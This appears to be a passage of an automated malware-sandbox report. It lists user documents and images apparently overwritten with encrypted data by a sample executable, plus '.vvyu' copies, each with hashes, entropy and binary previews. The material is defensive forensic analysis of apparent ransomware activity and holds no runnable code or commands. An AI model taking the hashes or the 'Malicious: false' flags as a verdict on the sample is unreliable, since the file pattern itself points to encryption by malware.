Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.846685858452274
Encrypted:	false
SSDEEP:	24:wvtZYA0PSWoGDI7v+0y+iz1Po+99DzaYQJE0Ec6jDCGi2C6sbD:IZ7oWeI720y7tlQJE0ERDBmD
MD5:	B76E02FF5A0E6C139A2C34971A590AB6
SHA1:	94A64F9DAE59785213A94D51C99C64F93AB625DA
SHA-256:	114679D7AE43434A4D04F0AF9A785ADDB9E7592010A1AA4AF60B358D87C9D07C
SHA-512:	754CF1E7899B4C1267B520CA9F56B5E19445FDFD9B1C2518F46B58C06BC30AB992F0F3C615EC13DAAE2171AEFF78A5963FC3C0AEEB4AF2F3C23CADAFA1F95A53
Malicious:	false
Preview:	BJZFP...$.i;w^q....[3.\Q:.XT.^.a..]..._.M.#4.Z..t....'....wb.=? .0.R=K.@. a..L..\|.....#.....On.............uK..G.....,..e...I.<Zg...~E!.z~n...../.E.O-.#.k...........I....&..H.:..FNF.b....s.~1..jg..........9xE..+o}iQ1._U.>.{.Z.....>...?Q0.B....Bm.2.....&Z.............E..d...N.....A.....$}\1..RQa....s.}.jW...:./....6...Q....Q..M...z..E..;.@.W...U;.kj?.T.....F.$m....._..cF]......p:......9...X..zSJ$.D....x)..,..f....'H.P..A.........J...v.z+.....~f.....O.i.....Lb..K..t..E..z.- .A},...u.u..A.....f`....h.A..-..s....k.i......obDQd.......[p.H..8D.... .]..).!.pA.k....k...J..."C..(J....../.........,B..d~.a......H.........I.*.n...T@..).G......T.......7<.].,..U..a .9......7^..m.....@i.....!c....!.4..s..v+m........P......A_.>.z."9.xA..g\|..k.'..z...`..8.!...Y../.dz......s...s.M........_ ^.).....x.>.U$dj.._...Y.m...2.......6.`Y..e...i..{..........B..Y....V.`5f9. ARzaO......hb.<%..o.C....v.vJ......^.)..@......>..At...kH..^.....M...~.]7..`

C:\Users\user\Documents\SQSJKEBWDT\EEGWXUHVUG.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862037763720535
Encrypted:	false
SSDEEP:	24:P22Bp8fTUhHTmjZ7psWKhf2/9Kc94l2B3SMkIV/nyZgYdoaYw8pSBdxL8sbD:/pkTU9T+Mhuj94gBCMkIV/tg1amD
MD5:	8944220D2BDD31244DDA678BC24BA48D
SHA1:	152210E27355A87E109C724A740F557A1EA66E5D
SHA-256:	18191C1F8B47D626F91A9C6CACED7C3AA696DE04A8DB5FACBCF15E768B4443B8
SHA-512:	1C1DC5AB9793E4338F2E188B996C075BDFEFF9B02FFB41B57659BE7EB46AE0EEC2018FFD1CD522623A185A1F279780D62FA3936C6080D13DD71F5CD3269DC5B9
Malicious:	false
Preview:	EEGWX..Ri. =...]......H.;.=...;.kM..}p...b....E.N....u/9..\0..}.......X. 5p...a.....X0X{....t..V~.<.I.....bc...,.u...E>....{.T..~..`..2KR.K.#...p..~....."\|8...0...}-......1H.(h.......D.S>.z.yS:Nf)....7H.J.X..?..tF_..[.p&...C...[..5...0.p.....}o.4.3...1.H..Pu.N...YS.$]O.o....Fa..rV...P.y.'O...q#b....z\|......Zs.q...S.(.V..r ..Qw.....I.\|b.\|<.oQ..Pw.....;..1:..kl.....1%....k._.]o..QW..}..0OTfw..R....'\|f.. %xG..'..g...1K...............il..J."...{.Nh534.rf........'.Q..wm...m......I.F.WS..mq.IJ.f...U].;-..Om..t.....g....>.).=.@..1C8G.E.......^.rx ..7.3..AT..FR.%.p{X....<X....{...o..U.....C.y..}..k.A...&v>}....1.e.......u.AH..r:....\....;<!@..I.8.<.0...[.V...[.Ej....f$3..qy...sq...,..3@.:...V......59..b...Ts.`.F...Q....8X.wq..^..s.)..9J.z..U@..s..#.....O.4...".......F'....h.......2.2.x.J..G.~.wtL.IsJlC.n.......V.3#a.....a,.'..R...._^.........,.&i....(.........d..2gJ..{{!......`;.,.....sz....&..&Y......J3F??..N.^.q{8......\.q.

C:\Users\user\Documents\SQSJKEBWDT\EEGWXUHVUG.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.862037763720535
Encrypted:	false
SSDEEP:	24:P22Bp8fTUhHTmjZ7psWKhf2/9Kc94l2B3SMkIV/nyZgYdoaYw8pSBdxL8sbD:/pkTU9T+Mhuj94gBCMkIV/tg1amD
MD5:	8944220D2BDD31244DDA678BC24BA48D
SHA1:	152210E27355A87E109C724A740F557A1EA66E5D
SHA-256:	18191C1F8B47D626F91A9C6CACED7C3AA696DE04A8DB5FACBCF15E768B4443B8
SHA-512:	1C1DC5AB9793E4338F2E188B996C075BDFEFF9B02FFB41B57659BE7EB46AE0EEC2018FFD1CD522623A185A1F279780D62FA3936C6080D13DD71F5CD3269DC5B9
Malicious:	false
Preview:	EEGWX..Ri. =...]......H.;.=...;.kM..}p...b....E.N....u/9..\0..}.......X. 5p...a.....X0X{....t..V~.<.I.....bc...,.u...E>....{.T..~..`..2KR.K.#...p..~....."\|8...0...}-......1H.(h.......D.S>.z.yS:Nf)....7H.J.X..?..tF_..[.p&...C...[..5...0.p.....}o.4.3...1.H..Pu.N...YS.$]O.o....Fa..rV...P.y.'O...q#b....z\|......Zs.q...S.(.V..r ..Qw.....I.\|b.\|<.oQ..Pw.....;..1:..kl.....1%....k._.]o..QW..}..0OTfw..R....'\|f.. %xG..'..g...1K...............il..J."...{.Nh534.rf........'.Q..wm...m......I.F.WS..mq.IJ.f...U].;-..Om..t.....g....>.).=.@..1C8G.E.......^.rx ..7.3..AT..FR.%.p{X....<X....{...o..U.....C.y..}..k.A...&v>}....1.e.......u.AH..r:....\....;<!@..I.8.<.0...[.V...[.Ej....f$3..qy...sq...,..3@.:...V......59..b...Ts.`.F...Q....8X.wq..^..s.)..9J.z..U@..s..#.....O.4...".......F'....h.......2.2.x.J..G.~.wtL.IsJlC.n.......V.3#a.....a,.'..R...._^.........,.&i....(.........d..2gJ..{{!......`;.,.....sz....&..&Y......J3F??..N.^.q{8......\.q.

C:\Users\user\Documents\SQSJKEBWDT\EFOYFBOLXA.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830184977357608
Encrypted:	false
SSDEEP:	24:wMGV0NBKCSiF/yP9hW436oRQyIolBt/pHfD+ZC+9pyY0dE3l1VdsbD:wHgBKo/KW4KorXBt/V6NpwETVdmD
MD5:	372C4BFF17516F0C2D24D92D4D65C8C9
SHA1:	3D5C276094671E200833F3C70D3BDEAFA584881F
SHA-256:	D87114DE94D08EBD520236CF2D7FC408F03F27352DBB91DFBDD284E83BAC6E34
SHA-512:	A2359EABACF066ADF7D769EB3389D4176789276BE67357743670D0F7EF30E4E6C4564E5576053EBEC0CCEF626C3515A92F524494D4DE872D6A93E751595209F5
Malicious:	false
Preview:	EFOYF.iAzx.....[b\Z.....q..V..r...M....S......7.!.5K.D....Dq/..Tx_.....:.DW....S<zE\|.h..L..G.&...qU^...X....8.'.$F.u....,P.`.q...;.-9...I....6U-'Z...5A.;......0E...x0..ru.{a..U.......Jr..!....O.i.Nq.....9..1...TH>..=.G....H.75L.u..?..."y8....n$.9...]."..?b.....Q.o.E;V.q.9...}6J...Z.y..~..:.U..g...T...........(2._`.[...A.X....A..91....E@..v/..\|....Xn ..Y.Y.7.I.(.B_..-f.(........u.GR;...Z.........%..A....d.....Q....%...$.t.3....9..U.K..pq....Y/"..J..B.../..1...$...........I...NC.<...\|...<.....$..t..^......F6.CU:WtZ./..ww:6.....V..j+.%6.....S.8.r7.R.B..u&.a.^...6n.xyfqt..6.X.(....UD.....!..~..`[_.8Q.c.Q..t`...gPX...RB....(...I...\8p{n....L...."'.iv."8A...).Cx.......v....?...j..c.J..S.).R..N,........f[...jcK.v.1..&U........,2V.....S.c..z......~..H..m.A.4..)>..U..b..f..$..j..;...N......@..5Y.w....MBF'.c.0F:..[.F^.0....B........<&h.(Rw...^]..sqO]:.<)..Fp`d<.rw).....,I....0....ew~~..;.3.z....-.F...`,A...A...z....j[....)..

C:\Users\user\Documents\SQSJKEBWDT\EFOYFBOLXA.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830184977357608
Encrypted:	false
SSDEEP:	24:wMGV0NBKCSiF/yP9hW436oRQyIolBt/pHfD+ZC+9pyY0dE3l1VdsbD:wHgBKo/KW4KorXBt/V6NpwETVdmD
MD5:	372C4BFF17516F0C2D24D92D4D65C8C9
SHA1:	3D5C276094671E200833F3C70D3BDEAFA584881F
SHA-256:	D87114DE94D08EBD520236CF2D7FC408F03F27352DBB91DFBDD284E83BAC6E34
SHA-512:	A2359EABACF066ADF7D769EB3389D4176789276BE67357743670D0F7EF30E4E6C4564E5576053EBEC0CCEF626C3515A92F524494D4DE872D6A93E751595209F5
Malicious:	false
Preview:	EFOYF.iAzx.....[b\Z.....q..V..r...M....S......7.!.5K.D....Dq/..Tx_.....:.DW....S<zE\|.h..L..G.&...qU^...X....8.'.$F.u....,P.`.q...;.-9...I....6U-'Z...5A.;......0E...x0..ru.{a..U.......Jr..!....O.i.Nq.....9..1...TH>..=.G....H.75L.u..?..."y8....n$.9...]."..?b.....Q.o.E;V.q.9...}6J...Z.y..~..:.U..g...T...........(2._`.[...A.X....A..91....E@..v/..\|....Xn ..Y.Y.7.I.(.B_..-f.(........u.GR;...Z.........%..A....d.....Q....%...$.t.3....9..U.K..pq....Y/"..J..B.../..1...$...........I...NC.<...\|...<.....$..t..^......F6.CU:WtZ./..ww:6.....V..j+.%6.....S.8.r7.R.B..u&.a.^...6n.xyfqt..6.X.(....UD.....!..~..`[_.8Q.c.Q..t`...gPX...RB....(...I...\8p{n....L...."'.iv."8A...).Cx.......v....?...j..c.J..S.).R..N,........f[...jcK.v.1..&U........,2V.....S.c..z......~..H..m.A.4..)>..U..b..f..$..j..;...N......@..5Y.w....MBF'.c.0F:..[.F^.0....B........<&h.(Rw...^]..sqO]:.<)..Fp`d<.rw).....,I....0....ew~~..;.3.z....-.F...`,A...A...z....j[....)..

C:\Users\user\Documents\SQSJKEBWDT\GRXZDKKVDB.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870385277071455
Encrypted:	false
SSDEEP:	24:q/to0NvQsOlo2OkNxAgVqT735g2Ec+jbK0J54FetHuS0RoKmH2esbD:q/lYjloybC735g2EZbXz4FeL0Rq2emD
MD5:	EB3FD5E54CE295EBBCF8288A154F5B13
SHA1:	54F7D9D072B317A2CB81270AA2B0636D5796AD14
SHA-256:	E70A2F5F0F5F494D95FD594F2CACF6AECB94EA78805E6599381EEF15E12E9E05
SHA-512:	6AA34C9DACDCFDE50534B04205776A132FEB72ECA6C1EEFFDC63E9AA6A8522CE7F87064705A9D56D37F824F7DB121759ECF7BF6FB6DD5657E81E9E46AADF2F86
Malicious:	false
Preview:	GRXZD./{.[<.....%..%}....Ho..8.........Pg.(..\......f.4H.S...C..k].@....k..`.....J..)..Kk.D.~..M.o..ay..]~Er...01...!...8u...=Q.m....RE.W&....pd.........bE3.J....2t:.cM.('..=...R......q.u_>.\.{...a..+.D.....Oeg...\|.....-8.....b.J..\.N.N...~..B....u.1#Z@....D.W.L.Y...3...{.1........SV.."...U.4.?.{.....Y.LR....6...e'.T....)I..\..Ze.._.H?.^z....5n...$.........."AC.SAx...x.C......T..B!\|..H4......8rZ\.P.S&^=..."..[.:..t.c....O.c.CVn...v.!`...a..5..g.r.G...DN.F4.aak..;....X.=\|..P..........;8.Q..?.8..P......g.....W..q..\f;......./K.k.}..q..AE.='..`.,.aH...5o......Qa.;...h.g.t...kI.....e...#..YK.W...?o.F...._Nb&...A.....s..A.......s..~.q...t...z.x..#~v .X..K....u....R ..^.2..g\[M....Ev.j......<M..`[o.....Mi0JR'.?.....}...e.a../7.$..n.O..R..e...[>.....6QV.V..u..P......{7o...v.{..w...M.....^....`C\|....z>4...]O/......=..Z..g.......D.E...N........{.......v..Pl.v.E.P.4..rIL.....E.+........<..J....`..u+....4..#\....7\..z...[..P.AV.....O...

C:\Users\user\Documents\SQSJKEBWDT\GRXZDKKVDB.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.870385277071455
Encrypted:	false
SSDEEP:	24:q/to0NvQsOlo2OkNxAgVqT735g2Ec+jbK0J54FetHuS0RoKmH2esbD:q/lYjloybC735g2EZbXz4FeL0Rq2emD
MD5:	EB3FD5E54CE295EBBCF8288A154F5B13
SHA1:	54F7D9D072B317A2CB81270AA2B0636D5796AD14
SHA-256:	E70A2F5F0F5F494D95FD594F2CACF6AECB94EA78805E6599381EEF15E12E9E05
SHA-512:	6AA34C9DACDCFDE50534B04205776A132FEB72ECA6C1EEFFDC63E9AA6A8522CE7F87064705A9D56D37F824F7DB121759ECF7BF6FB6DD5657E81E9E46AADF2F86
Malicious:	false
Preview:	GRXZD./{.[<.....%..%}....Ho..8.........Pg.(..\......f.4H.S...C..k].@....k..`.....J..)..Kk.D.~..M.o..ay..]~Er...01...!...8u...=Q.m....RE.W&....pd.........bE3.J....2t:.cM.('..=...R......q.u_>.\.{...a..+.D.....Oeg...\|.....-8.....b.J..\.N.N...~..B....u.1#Z@....D.W.L.Y...3...{.1........SV.."...U.4.?.{.....Y.LR....6...e'.T....)I..\..Ze.._.H?.^z....5n...$.........."AC.SAx...x.C......T..B!\|..H4......8rZ\.P.S&^=..."..[.:..t.c....O.c.CVn...v.!`...a..5..g.r.G...DN.F4.aak..;....X.=\|..P..........;8.Q..?.8..P......g.....W..q..\f;......./K.k.}..q..AE.='..`.,.aH...5o......Qa.;...h.g.t...kI.....e...#..YK.W...?o.F...._Nb&...A.....s..A.......s..~.q...t...z.x..#~v .X..K....u....R ..^.2..g\[M....Ev.j......<M..`[o.....Mi0JR'.?.....}...e.a../7.$..n.O..R..e...[>.....6QV.V..u..P......{7o...v.{..w...M.....^....`C\|....z>4...]O/......=..Z..g.......D.E...N........{.......v..Pl.v.E.P.4..rIL.....E.+........<..J....`..u+....4..#\....7\..z...[..P.AV.....O...

C:\Users\user\Documents\SQSJKEBWDT\NVWZAPQSQL.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863901962555387
Encrypted:	false
SSDEEP:	24:F9x9IZJQkKa9o0c8AsHwoFdX4SaaCWiZcMtEvQMb9C75pDUS6sbD:F39IZuV0c8AsQAoSqXZcMeb9+vDUS6mD
MD5:	0497F5006710236130181B74F1064FAA
SHA1:	36D5E225D9CC0A29B6E7C1D704D664EA171FA87F
SHA-256:	C6B0A07C3519E6B3296BC2BF82BA12DE3BF1443DB3FF9073F71D9F316D19308B
SHA-512:	7889533DE410E4F087C6899FDCD2A2122CEE3998C908879D11FEE7F19F29F873C570D3B9E2B3172FC7A3C8333DF0D898F0DCCA24DCC9CA78CED1A0B5E3F53C5C
Malicious:	false
Preview:	NVWZAo.;.5.\|.....+....D5.Q\|@4~sg_M..K.}.KM..D[....-m......c./.z7.8.s.P.....z..Wv...H.......o...G.f. RX.Q.Z.lP...Rh.m.....M.$.......-.s6jr.t.@.V..7L....\.'}._\..Bj....I.v..D[.A]PN...zp..n...HmgI.g..4\|...6O..l(........]YA......'W.h.......W.u(.......B.y.{.DTA..(2T...Q.{.....}../`Ww..z.M...Y.....?..e+....[.\Q..f..6.....F....n./......g.vn.#.L....J.q.....?$,..iaY...X.mvrq...<.....=^..T..Vy/4.f.'O;.#R>`..4..O.p.i.?,..?.../m..]...#e5Em.8^.....~RU.b.. .L.:T..:.)../../.%.nf...w...Sl.t....g...4..P.i7P...\|m:.....b......w.xl..Q.^...`e..].1k.m.]Z.c.>.SM......[.;.!.QV.%......J. ..{..rN.2..Hm....s.,...+..u.Z0.R)..p...f....l.V.@9.`..(.....<.z..2..raZ..Z..4.2..`.....~E.r..i..?....I.2tq.yX.-t....<&...,A...T.p.36"...1.q. .^........~...?q...4...........B.z........C.....m...m..m.2..Os.!`5....<.g~`.5;..Q..."...S.....l..8.Z.~.....R.y....K)..z..b.._].........;.O......z..p....M.....}.[..^.7 4T.Y>.:.....u0.....:..(7...)T.W.W..;+T.....U.Rh..=HE.........Uy0T%.v.V(

C:\Users\user\Documents\SQSJKEBWDT\NVWZAPQSQL.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.863901962555387
Encrypted:	false
SSDEEP:	24:F9x9IZJQkKa9o0c8AsHwoFdX4SaaCWiZcMtEvQMb9C75pDUS6sbD:F39IZuV0c8AsQAoSqXZcMeb9+vDUS6mD
MD5:	0497F5006710236130181B74F1064FAA
SHA1:	36D5E225D9CC0A29B6E7C1D704D664EA171FA87F
SHA-256:	C6B0A07C3519E6B3296BC2BF82BA12DE3BF1443DB3FF9073F71D9F316D19308B
SHA-512:	7889533DE410E4F087C6899FDCD2A2122CEE3998C908879D11FEE7F19F29F873C570D3B9E2B3172FC7A3C8333DF0D898F0DCCA24DCC9CA78CED1A0B5E3F53C5C
Malicious:	false
Preview:	NVWZAo.;.5.\|.....+....D5.Q\|@4~sg_M..K.}.KM..D[....-m......c./.z7.8.s.P.....z..Wv...H.......o...G.f. RX.Q.Z.lP...Rh.m.....M.$.......-.s6jr.t.@.V..7L....\.'}._\..Bj....I.v..D[.A]PN...zp..n...HmgI.g..4\|...6O..l(........]YA......'W.h.......W.u(.......B.y.{.DTA..(2T...Q.{.....}../`Ww..z.M...Y.....?..e+....[.\Q..f..6.....F....n./......g.vn.#.L....J.q.....?$,..iaY...X.mvrq...<.....=^..T..Vy/4.f.'O;.#R>`..4..O.p.i.?,..?.../m..]...#e5Em.8^.....~RU.b.. .L.:T..:.)../../.%.nf...w...Sl.t....g...4..P.i7P...\|m:.....b......w.xl..Q.^...`e..].1k.m.]Z.c.>.SM......[.;.!.QV.%......J. ..{..rN.2..Hm....s.,...+..u.Z0.R)..p...f....l.V.@9.`..(.....<.z..2..raZ..Z..4.2..`.....~E.r..i..?....I.2tq.yX.-t....<&...,A...T.p.36"...1.q. .^........~...?q...4...........B.z........C.....m...m..m.2..Os.!`5....<.g~`.5;..Q..."...S.....l..8.Z.~.....R.y....K)..z..b.._].........;.O......z..p....M.....}.[..^.7 4T.Y>.:.....u0.....:..(7...)T.W.W..;+T.....U.Rh..=HE.........Uy0T%.v.V(

C:\Users\user\Documents\SQSJKEBWDT\SQSJKEBWDT.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859942385156577
Encrypted:	false
SSDEEP:	24:E0mOsu/R1Xp7xCUROiYioBJPrDwOU0Dpdxsk0szVVO8WAx41c1io3FpGxZeBrvdH:E0mOsuTXvCURqiCr8OU0DpTzVVwm31Aq
MD5:	7D105D8DF5BBA9B61ED3DB8ACD4A74E1
SHA1:	2A716D8976162D7E4E8C708D5A9CA2F0886CDD8E
SHA-256:	CED0A3D10E6DC1FD70563107E2CF9055D87A0EC16F94EC37C267B60E56EC74C6
SHA-512:	7572796C9A48BD64DFBCC410731505D35DD7D78798E04FA2A6359A9F5A0778CE452FD0AC94FAD440DB8ABF50E3C016C40F30DAC761BBC304A534D9444AB3D44A
Malicious:	false
Preview:	SQSJK...>[,..k.m...,..S..0/...d..clk.....u.....5...Vk1.C._..'..Ky.Z.}f..O7..j.m..d".E.iZ X./=...._... ..4.S.H.m.o0..-?...w.B....._...... ....l.h#..Q..9"G..C/M].Y.<.G&.........?..a...u...Z..s..f...po ...?.....C7...#.......t....#..'Z.-.>..6..B.h.a.85..O.......=9[.p.(..9./._+.QG.\%.`>.-.R>$v..-=`3..b.>..XFI...W."(e..<.......U..2.#k.R...3.#..@B.].......fB...V..so.xw2..eH..+....R..O...W).x$.....EF...K......"..,r...FF.14..../JE'..(.}\.Eo..9..], n!..W....=.c...PG...}r......:...P9_.X...D..i..QT........;..=L........6-.....&S...\..;.@R......G..zfi..N..w.....kY%...6...<.]#.-....8.a.........h....eIyE8....\.M.v1..-!Lp..F9.nq..S0j."r..I...%...b..f.u.8.z..7...n.>.uH.x2._d.......>.....%r....b-...._...X..E.@.M..!.....n".M.h.UA.....6..gJ.{..".S...f4v$._.Xp....<k...}.D.6.<.F...a..yW.....4..#....E".6..j:..._.'.......-..>...r.\|../^..'.[..Y(....r+x"....N. s.<......g1....q..>6.....-..aim.W.i.S......t"....XS[..s..&../.A.....vnl`...,...s...q

C:\Users\user\Documents\SQSJKEBWDT\SQSJKEBWDT.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.859942385156577
Encrypted:	false
SSDEEP:	24:E0mOsu/R1Xp7xCUROiYioBJPrDwOU0Dpdxsk0szVVO8WAx41c1io3FpGxZeBrvdH:E0mOsuTXvCURqiCr8OU0DpTzVVwm31Aq
MD5:	7D105D8DF5BBA9B61ED3DB8ACD4A74E1
SHA1:	2A716D8976162D7E4E8C708D5A9CA2F0886CDD8E
SHA-256:	CED0A3D10E6DC1FD70563107E2CF9055D87A0EC16F94EC37C267B60E56EC74C6
SHA-512:	7572796C9A48BD64DFBCC410731505D35DD7D78798E04FA2A6359A9F5A0778CE452FD0AC94FAD440DB8ABF50E3C016C40F30DAC761BBC304A534D9444AB3D44A
Malicious:	false
Preview:	SQSJK...>[,..k.m...,..S..0/...d..clk.....u.....5...Vk1.C._..'..Ky.Z.}f..O7..j.m..d".E.iZ X./=...._... ..4.S.H.m.o0..-?...w.B....._...... ....l.h#..Q..9"G..C/M].Y.<.G&.........?..a...u...Z..s..f...po ...?.....C7...#.......t....#..'Z.-.>..6..B.h.a.85..O.......=9[.p.(..9./._+.QG.\%.`>.-.R>$v..-=`3..b.>..XFI...W."(e..<.......U..2.#k.R...3.#..@B.].......fB...V..so.xw2..eH..+....R..O...W).x$.....EF...K......"..,r...FF.14..../JE'..(.}\.Eo..9..], n!..W....=.c...PG...}r......:...P9_.X...D..i..QT........;..=L........6-.....&S...\..;.@R......G..zfi..N..w.....kY%...6...<.]#.-....8.a.........h....eIyE8....\.M.v1..-!Lp..F9.nq..S0j."r..I...%...b..f.u.8.z..7...n.>.uH.x2._d.......>.....%r....b-...._...X..E.@.M..!.....n".M.h.UA.....6..gJ.{..".S...f4v$._.Xp....<k...}.D.6.<.F...a..yW.....4..#....E".6..j:..._.'.......-..>...r.\|../^..'.[..Y(....r+x"....N. s.<......g1....q..>6.....-..aim.W.i.S......t"....XS[..s..&../.A.....vnl`...,...s...q

C:\Users\user\Documents\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855623668768937
Encrypted:	false
SSDEEP:	24:/70E37umzghXbEtu7iCgHD5l/DN7WlP7b2zE7/jozfupRa4jancC8J/sbD:j0ELugZNJHDTYljb2A7UzmpRa4jan1U2
MD5:	2834A6C84E253881749A165C833F3A3A
SHA1:	4BDF3035A4FA60B340E3A05572993D10992BBC5F
SHA-256:	2ED1F4DCF3DD9FD1E0E1DAE62D4965E72F74EE5E7C3E83AE635CBBAE25E3F238
SHA-512:	9CFCB58E6470EB4901188676F7F7D525DEAAA15F9A48FE308254C60D011C1B3BD83ABBBB6228EA475694C95BDD201D0E8DACB8C925F53F84B5C4FE367960C4DD
Malicious:	false
Preview:	TQDFJ.v..gl.1.9x..t.[.1.D.r..k.....8..5......L........t..[..Q.q..w...]k.93>j.]0.."4ZxMNLH.I.:.D..+..;....h..UASd.y..f...8x.m....2_.`.?.g.U.@....c..........)........Y==#.h-..g...;.v...........-dJ..tru\|\g......u@...i...C.....H.5.ja.......6....`...r@S:'.s:.......Bs.....<....i.Ixc.O@..B@c..w!..........Cx...px.Xi..A....n.....A^."N.d.Yla....z..a..T.Ay.!>.....T... ?.b.....n}....U...\_....i7...F..s\|..t...[.....d...}..2.u\|...S.:.<y.W.5..;[}.....[6.P9&..9.[....K.....l....r%.V.}Z"kx.-.wo....E2..E..a.<k.....;.D..O......tJ....S.......W`.'.B........9......P..(2.&\..!..x.h..y..l.e..0..D.\|...4.\q.&.T.x..l.oE........Xl.'....a.[.1.Ws...$..t.r.#.OW..C...}.......L.i.Kq.g.."..!.~., ..gm.F.,.%.(n.m.T..L.[..8+Bn.u..z.R%.[.N.<x 8.......5>..X_...?0#qk.0T.vP)$\...l~XP.<.9P.@V.b,.....Y'......Kw.lm..z.[.uw.y....>....3%.~.@3XEN...%.......).z{.6...qi.8....*....\.S` .m..P.c`..,.RD.c.l.42"....U...4+...".....w.ZWM.z.tE..y.E.;A...#>.jfx.c..6.<.S.....a..o...>I..

C:\Users\user\Documents\TQDFJHPUIU.png.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.855623668768937
Encrypted:	false
SSDEEP:	24:/70E37umzghXbEtu7iCgHD5l/DN7WlP7b2zE7/jozfupRa4jancC8J/sbD:j0ELugZNJHDTYljb2A7UzmpRa4jan1U2
MD5:	2834A6C84E253881749A165C833F3A3A
SHA1:	4BDF3035A4FA60B340E3A05572993D10992BBC5F
SHA-256:	2ED1F4DCF3DD9FD1E0E1DAE62D4965E72F74EE5E7C3E83AE635CBBAE25E3F238
SHA-512:	9CFCB58E6470EB4901188676F7F7D525DEAAA15F9A48FE308254C60D011C1B3BD83ABBBB6228EA475694C95BDD201D0E8DACB8C925F53F84B5C4FE367960C4DD
Malicious:	false
Preview:	TQDFJ.v..gl.1.9x..t.[.1.D.r..k.....8..5......L........t..[..Q.q..w...]k.93>j.]0.."4ZxMNLH.I.:.D..+..;....h..UASd.y..f...8x.m....2_.`.?.g.U.@....c..........)........Y==#.h-..g...;.v...........-dJ..tru\|\g......u@...i...C.....H.5.ja.......6....`...r@S:'.s:.......Bs.....<....i.Ixc.O@..B@c..w!..........Cx...px.Xi..A....n.....A^."N.d.Yla....z..a..T.Ay.!>.....T... ?.b.....n}....U...\_....i7...F..s\|..t...[.....d...}..2.u\|...S.:.<y.W.5..;[}.....[6.P9&..9.[....K.....l....r%.V.}Z"kx.-.wo....E2..E..a.<k.....;.D..O......tJ....S.......W`.'.B........9......P..(2.&\..!..x.h..y..l.e..0..D.\|...4.\q.&.T.x..l.oE........Xl.'....a.[.1.Ws...$..t.r.#.OW..C...}.......L.i.Kq.g.."..!.~., ..gm.F.,.%.(n.m.T..L.[..8+Bn.u..z.R%.[.N.<x 8.......5>..X_...?0#qk.0T.vP)$\...l~XP.<.9P.@V.b,.....Y'......Kw.lm..z.[.uw.y....>....3%.~.@3XEN...%.......).z{.6...qi.8....*....\.S` .m..P.c`..,.RD.c.l.42"....U...4+...".....w.ZWM.z.tE..y.E.;A...#>.jfx.c..6.<.S.....a..o...>I..

C:\Users\user\Documents\ZGGKNSUKOP.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85981710732032
Encrypted:	false
SSDEEP:	24:H/gMiOHRi37UW6yVJlGzGIjlBnV8ZkMDhDnZFeTOsWAqbflxuJShUsbD:Sp37U/8TIjuzTZUzqbfb1UmD
MD5:	52D8D4BCE529EAF982C5669A76B9A427
SHA1:	1ED9876240977A6D1365AC38EA060B34D5ABF0D4
SHA-256:	DF505F3EC70C4AACC686BA96A299C673C3B1FCF26629D16821050673AA9C5687
SHA-512:	4B340CC3514C236C65B42F68834DEC1ED3D1D97B338D9097446F8D1838F7639E16426BB99A19E4475659D345B1943235F44C8A44999A1367DAF7E37DC2AC5AE9
Malicious:	false
